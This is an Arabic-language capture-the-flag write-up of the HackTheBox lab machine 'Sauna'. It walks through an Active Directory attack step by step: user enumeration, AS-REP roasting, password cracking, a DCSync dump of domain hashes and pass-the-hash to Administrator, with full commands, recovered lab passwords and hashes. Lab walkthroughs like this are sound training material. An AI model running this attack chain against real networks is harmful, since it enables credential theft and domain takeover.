Sauna - بالعربي

حل sauna بالعربي

Recon

1- عادة رح قلك " تبدأ الاول بعمل Scan على الماشين ب nmap عشان تشوف ال Open Ports الموجودة و ال services/الخدمات و شو منهم فيه ثغرة/vulnerable فتستغله و طبعا بدون عمل استطلاع/recon او enumeration ما ممكن تبدأ اي عملية Pentesting او Hacking" بس هي المرة رح قلك اعتبرها " طرق على المنافذ" او الشبابيك او الابواب صدقني ما فارقة

nmap -sV -sC -p- 10.10.10.175

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-12 09:06:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h15m26s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-12T09:07:18
|_  start_date: N/A

في شوية شغلات مثيرة للاهتمام فخلينا نبحبش ("البحبشة" كلمة سورية أصلية تعني البحث) اكتر

SMB‌

كلعادة smbmap & smbclient

smbmap -H 10.10.10.175

[+] IP: 10.10.10.175:445        Name: EGOTISTICAL-BANK.local

ضفت الدومين لملف ال hosts

smbclient -L 10.10.10.175

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

ما طلع معي شي فرحت اشوف LDAP

LDAP

nmap -n -sV -p 389, 3268 --script "ldap* and not brute" 10.10.10.175

في معلومات كتير هون, و ما كان في منها الفائدة الكبيرة, بس لسا قراتها ممتعة

بما انه ما طلعنا بشي بال SMB, LDAP قررت اروح لل HTTP او الموقع

The Website

بلشت العب شوي و اطقطق هون و هنيك (الهاء بالضم 🙃) و استخدمت ادوات متل dirb, gobuster قرات ال source code او الكود المصدري, و انا عم اتصفح الصفحات وصلت ل about.html و فيها اسماء الفريق

هلق بما انو معنا الاسماء, فالموضوع كلاتي الاسماء رح تستخدم ك usernames او للحاسابات جوا السيرفر, ف أحيانا بتنكتب مثلأ: 1- اول حرف من الاسم و الكنية 2- الاسم الاول و الكنية هي امثلة ممكن تكون مكتوبة بشكل مختلف, بس انا مشيت مع المثال الاول و عملت قائمة كلاتي:

fsmith hbear skerb scoins btaylor sdriver

هون فينك تعمل عدة شغلات بالمستخدمين, انا بدأت باداة kerbrute بحيث اتاكد ان في واحد منهم شغال

./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.local users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 05/12/21 - Ronnie Flathers @ropnop

2021/05/12 15:54:54 >  Using KDC(s):
2021/05/12 15:54:54 >   10.10.10.175:88

2021/05/12 15:54:54 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.local
2021/05/12 15:54:54 >  Done! Tested 6 usernames (1 valid) in 0.355 seconds

ف HOLLAY المستخدم fsmith طلع موجود

Exploitation

خلينا هلق نعمل ASREP-Roast

‌ASREP-Roast

impacket-GetNPUsers -format hashcat -usersfile users.txt -no-pass -k -dc-ip 10.10.10.175 EGOTISTICAL-BANK.local/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d2ce372b78b81236a49833b9c8695bdd$bf7e5d488a39f63eebd3fc4ee09e6cbbbd5781bf48acb29da299be1d2779ceca08e326f421937d0c3157faf4af766098a9b4a358093c3fbfd146113e9f2cc328d0cb39043b6147e3f495900063ff82059d54bc01cb9599629460d0629e472012316d812f6311da1e995258eef4fc51cceb5220f12bf7f6d45645bd2e07575d9d26692672324bf9e869089c93f91ad0a35446709738d6b6d7c6f026a86aec1e1d052d509d0570edd23d8c5a49e0cfed6ed2cc229124a2686de8d5c04e863ce2cd580513081e746cafcd4e97c8e76d5355c38a28c80f341a71eb4bf1fdebc631fe5556617f82a7b943c67d66ebfd5abb9161a7a0f0aa0e244a1a772b269c176dfa
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

حصلنا هاش, انا بحب اكسره او اعمله كراك لاني بحب اعرف شو هي كلمة السر, أحيانا الناس بتأبدع بكلمات السر

hashcat.exe -m 18200 fsmith_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d2ce372b78b81236a49833b9c8695bdd$bf7e5d488a39f63eebd3fc4ee09e6cbbbd5781bf48acb29da299be1d2779ceca08e326f421937d0c3157faf4af766098a9b4a358093c3fbfd146113e9f2cc328d0cb39043b6147e3f495900063ff82059d54bc01cb9599629460d0629e472012316d812f6311da1e995258eef4fc51cceb5220f12bf7f6d45645bd2e07575d9d26692672324bf9e869089c93f91ad0a35446709738d6b6d7c6f026a86aec1e1d052d509d0570edd23d8c5a49e0cfed6ed2cc229124a2686de8d5c04e863ce2cd580513081e746cafcd4e97c8e76d5355c38a28c80f341a71eb4bf1fdebc631fe5556617f82a7b943c67d66ebfd5abb9161a7a0f0aa0e244a1a772b269c176dfa:Thestrokes23

CREDS: fsmith:Thestrokes23

متحمس؟ حصلنا كلمة سر 😃 اصبر للي جاي 😋

SMB with fsmith account

smbmap -H 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

[+] IP: 10.10.10.175:445        Name: EGOTISTICAL-BANK.local                            
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        RICOH Aficio SP 8300DN PCL 6                            NO ACCESS       We cant print money
        SYSVOL                                                  READ ONLY       Logon server share 

smbclient -L 10.10.10.175 -U 'fsmith'

Enter WORKGROUP\fsmith's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Get Access

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

Post-Exploitation

بعد ما تجيب الفلاج يا صديقي العزيز رح نبدأ ال enum, عادة بحب اكون شوي يدوي و استخدم شي متل powerview, بس بدي اخلص هي الماشين بسرعة ف رح استخدم ادوات اوتومايتيكة متل SharpHound + BloodHound و winPEASx64.exe

BloodHound

نبدأ مع BloodHound, اتبع الخطوات المعتادة:

1- حمل Sharphound على الماشين 2- اعمللها import او شغلها 3-

Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser fsmith -LDAPPass Thestrokes23

4- نزل ملف ال .zip ع جهازك 5- ارميه ب BloodHound و خلينا نمرح شوي

قصة طويلة, قعدت العب كتير هون و هيك كان شكلي

ف رح قلك انا شو سويت ع طول

اول شي بحثت على fsmith و علمته ك Owned و حاولت اشوف وين فيني اروح مع هاد الحساب, شو فيني سوي فيه ! ف اضغط على اسم المستخدم بعدين على Reachable High Value Targets

بما انو في CanPSRemote فحاولت استغلها اعمل powershell remote و ماشتغلت, و انا فاهمك الموضوع بكسر القلب بس هي الحياة يا صديقي لازم نتابع

رجعت مرة تانية لل analysis و ضغطت على Find Principals with DCSync Rights

المستخدم المعه DCSync rights بعني ان ممكن نستخدمه لنعمل DCSyns Attack فمنقدر ننتحل ال DC و نطلع hashes نعدل , نعمل امور معينة, لو عم تسئل شو هو ال DC اعتبره المدير, الرئيس, القائد, الحاكم, big dog, الهدف الاعلى, اي شي بدك ياه

بعد ما ضغطت فوق اول شي شفته هو مستخدم مع GetChanges Rights و هاد ممكن يفيد

ازا ضغطت كليك يمين على ال GetChanges بعدها Help رح تعرف ان ممكن تعمل DCSyncs attack مع هاد المستخدم هيك معنا المستخدم بس بدنا كلمة السر, ف يلا كمان enum

winPEAS

بلشت ب winPEASx64.exe

./winPEASx64.exe

و من بيانات كتير و نتائج كتير مثيرة للاهتمام حصلت هي :

    DefaultUserName               :  EGOTISTICAL-BANK\svc_loanmgr
    DefaultPassword               :  Moneymakestheworldgoround!

هكر هكر تل ابيب, جبنا كلمة السر !

CREDS: svc_loanmgr:Moneymakestheworldgoround!

Dump the hashes

فينك تعمل enum بهي ال creds تدخل smb, winrm ... الخ بس انا رح اروح مباشرة ل اني اطلع ال hashes ب secretsdump

sudo impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d4ce71f8b6d50cf725737fb30ed9e0cc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:62b76ee658204d408e3ff9081ded8388a8e23f0ac2e5c38f4585d809505a1d00
SAUNA$:aes128-cts-hmac-sha1-96:a997c32916d2e2584424e0ee476300b2
SAUNA$:des-cbc-md5:3db03e2fba6d3157
[*] Cleaning up... 

Get in as Administrator

هلق PtH, Pass the Hash ب evil-winrm و ندخل ك admin

evil-winrm -i 10.10.10.175 -u 'Administrator' -H 'd9485863c1e9e05851aa40cbb4ab9dff'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator

و مبروك عليك, هلق فينك تروح تجيب ال root flag و خلصت الحكاية.

Happy Hacking MHZ-Cyber